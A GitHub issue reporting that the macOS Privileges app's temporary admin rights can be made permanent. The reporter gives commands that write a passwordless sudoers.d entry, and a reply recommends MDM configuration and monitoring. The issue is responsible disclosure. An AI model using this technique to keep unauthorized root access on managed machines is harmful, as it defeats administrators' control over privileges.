Temporary admin rights can be prolonged undefinitly with sudoers.d/ entry
angrox opened this issue · comments
Description
After using the Privileges app once, the status of the app (locked/unlocked) can be bypassed using a entry in sudoers.d/ directory.
Prerequisites
/etc/sudoers contains a line to include the sudoers.d directory (default in MacOS Sonoma and below)
#include /etc/sudoers.d
Bypass Example
- Enable Admin mode
PrivilegesCLI --add
User user1 has now admin rights
- Create an entry in /etc/sudoers.d:
sudo cat << EOF > /etc/sudoers.d/user1
user1 ALL = (ALL) NOPASSWD:ALL
EOF
- Remove Admin mode
PrivilegesCLI --remove
User user1 has now standard user rights
- Check sudo permissions
sudo -l
[...]
User user1 may run the following commands on machine1:
(ALL) NOPASSWD: ALL
- Check root access (without password)
sudo whoami
root
The user user1 has now unlimited administrative access.
Possible solution
Config option to allow/disallow sudoers.d entries, or a list of configured entries
There are a thousand ways how a user get privilege persistence once admin rights are available (LaunchDaemons, cron entries, Privileged Helper Tools, specialized apps), so this would be an endless game of cat and mouse...
That problem would be better handled by "Service Configuration Files" coming from your MDM (see https://support.apple.com/en-ca/guide/deployment/depdac2c8d89/web), as well as automated monitoring of privilege escalations with another tool.